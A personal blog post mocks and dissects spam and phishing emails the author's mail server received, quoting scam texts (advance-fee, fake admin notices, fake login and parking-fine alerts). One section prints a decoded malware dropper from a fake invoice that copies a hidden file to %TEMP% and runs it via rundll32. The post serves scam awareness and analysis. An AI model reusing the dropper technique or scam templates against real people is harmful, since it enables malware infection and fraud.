I have been running a mail server for this site for the past year or so, and through the magic of SPAM and SPAM filters, I have acquired an ever growing collection of SPAM messages, phishing attempts and different attempts at getting my money one way or another.

Note: This post is getting regular updates as I get more and more SPAM.

Regular SPAM

Barely worth any mention, but it is there. Your runn-of-the-mill SEO proposals, links to dubious quality stuff on AlieExpress, etc… These are boring but they exist so with that out of the way, let’s start with the funnier ones that landed on my server’s SPAM folder.

Classic “Nigerian Prince” scam

I was very surprised both by these emails existing in 2022 and them being pretty much exactly the same they have been since I have memory of the Internet. The “Nigerian Prince” scam or “Advance fee fraud” promises a large amount of money in return of you, the mark, paying the “fees” needed to unlock that money.

A typical example from my mailbox, redacted for brevity and scammers’ privacy:

Dear Sir

Sir, greetings to you and your family, I hope you all are in good health ? It is my pleasure to read your response and I thank you very much for your reply. May God bless you..

I am Miss Sonia Peter Fofo, the only daughter of PETER FOFO who died in a motor accident some months ago. He was a contractor to the federal government of Cote d’Ivoire. Before he gave up in the hospital he told my mother and I that he deposited a sum of US $ 3.5 million with a bank in Lome-Togo and where the documents are.

Now we are looking for someone who will assist us and claim the (money) so that when it arrives in his home/ country he will take his own share and send it to us our own. I am writing this mail to see if you can assist us.

Upon receipt of your acknowledgment mail I shall send you the contact of the bank director. Please contact me back on my private email : [scammer]@aol.com

Thanks

Miss Sonia Peter Fofo

Pretty standard stuff. Bad grammar, generic platitudes, large sums of money from someone using free email, some generic sob story, reply to an email different from the one used to send the email, etc…

SpamAssassing analysis result were also pretty funny, especially knowing that certain sentences like “Dear [whatever]” will immediately rise the SPAM level of a message.

Rule Description
DEAR_SOMETHING BODY: Contains ‘Dear (something)’
LOTS_OF_MONEY Huge… sums of money
MONEY_FREEMAIL_REPTO Lots of money from someone using free email?
MONEY_FRAUD_8 Lots of money and very many fraud phrases

This is the server admin!

I have received one or some of these, and a few can punch through SpamAssassin and land on my inbox. These messages look like a mailer error, or some server warning that requires attention from the user. Most of these claim to be from the mail server administrator (hello me!) and require clicking on some link to check what the issue is.

These tend to look kinda professional and the HTML formatting is decent. An example, although text-only, of these messages:

Message generated from heavydeck.net server.

Notification Dear root,

Your account associated with your root@heavydeck.net has been limited Reason: Messages - Delivery Process Failed .

What happens when new messages are inaccessible?

Once a new message is limited, it will be inaccessible—users will not be able to receive new messages.

Want to keep the account and receive new messages? [Link to scammers website]

heavydeck.net email support

Funny, I don’t remember sending myself an email regarding an issue I myself should already be aware of… 🤔

Notice from a service you didn’t use

This one was pretty funny. I receive a notice from a service where they inform me that they are shutting down, but I can get all of the database before they do. For a nominal fee, of course.

Hello,

My name is [whatever]

I regret to inform you that [scam.org] will shut down Friday.

We have now made all our databases available to the public on our website at a one-time fee. Visit us at [scam.org]

Among other things, this SPAM email was received as plain text, with no embedded links nor referral URLs, just a link written on the message as-is.

Additionally, the domain was registered ~6 months back (at the time of writing) and will expire in 6 months. On that time this completely legit company has managed to start, launch, and prepare for shutting down. In 6 months.

Very very pessimistic entrepreneurs.

Please open the “invoice” attached

Another classic. An email from an alleged rental car company (in this case) sends me an invoice attached to the email. Grammar was bad and email formatting was subpar, with just “Re:” as the subject.

Unlike any other rental car service where invoices come as a PDF document, this “company” invoice comes on a password protected ZIP, containing an ISO file, containing a windows link file.

Hello, Let me share the papers we talked regarding a few days ago. Let me know if you have any queries relating to the attachments.

Personal password: doc1234

We look forward to hearing from you soon.

Kind regards,

Attached car papers to this link

Analysis of the “invoice”

The ISO file apparently contains a single .lnk file, however, the link points to the file ladpsikeyfad/expressimaging.bat which is not visible for the user since it is under the hidden (by the UDF filesystem contained on the ISO file) directory ladpsikeyfad which Windows can access if you know the full path, which the attacker knows of course.

Now what does expressimaging.bat do? Well, it is a batch file, scrambled using %variables% but after decoding it, the command line is

@echo off
xcopy /s /i /e /h ladpsikeyfad\rewarding.dat %TEMP%\*
rundll32 %TEMP%\rewarding.dat,#1

In essence, just copy this rewarding.dat file to %TEMP% and execute it with rundll32. Time to spin up a virtual machine and check what this car rental company had for me. (Me from the past: “My bet is on a cryptolocker”)

Opening the “invoice”

Meanwhile, Me from a few hours later…
Whatever the executable is, it doesn’t seem to do a thing on a VM without internet connection. It just sits there, running, using barely 1M of RAM…

A few hours later…
Let’s give it internet… Becasue I’m curious about it… Nothing. The C&C must be down…

New login attempt!

This one surprised me. I received a “new login” notification on my own server, which does not have any service you can login to. This login is apparently suspicious (you don’t say) and your account mey be suspended if no action is taken.

Bad login

That shiny blue button links to an IPFS gateway which will probably give me a very, very legit site. Let’s check it out removing the trailing tracking info that points to my email.

Sus login

Secured by Norton. I already feel safe! Although it don’t remember even having a webmail service at all on this server.

Scammer cannot fill in the blanks

Edit: Bonus content! Scammers cannot fill in the data of the scam as a service packege they bought!

This one is just like the previous one, suspicious login on your stock trading account and blah blah blah. However, this one caught my eye because the wannabe scammer clearly used a “fill in the blanks” template for this…

Cannot fill in the blanks

… And then forgot to actually fill in the blanks. Money well spent.

Renewal notice from a service I do use

This one I almost fell for. A scammer sent me a “renewal” notice impersonating a service I do use, NetCup, telling me my domain is about to expire. All the contents of the message were correct, except for one thing, I do not use NetCup as my registrar. They seem to be aware of the issue but just take a look anyway:

sus

Kudos for the scammer for:

  • Getting the hosting service correctly
  • Sending the message in the correct language (german)
  • Getting the domain name expiration date correctly
  • Making a decent look-alike email

Edit: Some native german speakers confirmed the language is “kinda broken” but for someone learning german, it just looked the part good enough.

Would you be interested in this other domain?

This one is new. I do not, nor have I been interested in owning, the dot com version of this same domain, since this is, after all, just my personal site which started as a joke on a game I haven’t played in close to a decade.

However, as of the last few days I have received no less than an email a day asking if I was interested in purchasing the dot com version of the domain. With each new email the tone seems to subtly change.

Edit: This email spamming has gotten so bad I made a dedicated post.

We send SPAM for you

Another SPAM message, offering SPAM services, which was caught by my SPAM filter (not a good look).

Advertise up to 200 MILLION EMAILS WITH THE LOWEST PRICE! Immediate BOOM OF SALES!

[…]
( ) US$ 150 - Advertise to 1 MILLION EMAILS
( ) US$ 200 - Advertise to 5 MILLION EMAILS
( ) US$ 300 - Advertise to 25 MILLION EMAILS
( ) US$ 500 - Advertise to 50 MILLION EMAILS
( ) US$ 750 - Advertise to 100 MILLION EMAILS
( ) US$ 1000 - Advertise to 200 MILLION EMAILS

Acording to the info provided this internet company from Brazil has been doing SPAM as a service since 1998.

Saudi group with a loan for me

I didn’t expect a personal blog with zero commercial projects would attract saudi “dumb money” like that…

Assalamu Alaikum,

I am Faisal Al Rasheed by name, we are a group of loan funding investors based here in Saudi Arabia, would you need a loan for financing your project? If you have a project that needs a loan then let’s know the amount required to finance the project and tenure of the loan you would need to finance the project and I will reach out to other investors in our funding group and get back to you as soon as possible.

Shukra’n Faisal

Interesting that Saudi money uses both Outlook and Gmail accounts.

A domain name you can trust

Who wouldn’t trust a link to a domain that looks like this?

x1.dfkjghskjhrtuie.org.ru

My cat can suggest another one:

lkllkjasdflkasdwiuhrmnfg.com

(Subject name here)

An otherwise unremarkable SPAM email trying to sell me some “game console” but the trailing line got me; Emphasis mine.

If this sounds like something that will make your life a whole lot better, let’s chat for 15 minutes this week. How does your calendar look this [day of week]?

Please, if you are paying for a SPAM campaign, at least fill in the blanks!!

A fake parking ticket

This one, a fake parking ticket, I almost fell for for a number of reasons:

  • It landed on my Gmail inbox, not on SPAM
  • I did park my car at a questionable place in the past
  • The email looked kinda legit and had no typos

The message, loosely translated, looked like this:

Pending Payment for Parking Fine Dear Customer

We inform you that we have not received your payment of €140 for unauthorized parking. To avoid additional charges and possible legal action, please make the payment within a period of no more than 24 hours.

(Link to payment)

Thank you for your prompt attention to this matter.

Sincerely, (government agency)

This message is generated automatically. Please do not reply to this email.

Some red flags made me raise an eyebrow:

  • “Dear customer” (I’m fairly sure the government knows my name, and i am NOT a customer)
  • “24h” and “legal action” (If they wanted to get paid, I would receive a physical letter with a payment form, as with back taxes)
  • And not a single official looking logo on the email

Then the link would have taken me to an URL shortener service, which I did not click before send it to the SPAM folder manually, but for Science, let’s see if the phishing site even looks legit:

Not active anymore
It seems the same link got posted on too many SPAM messages…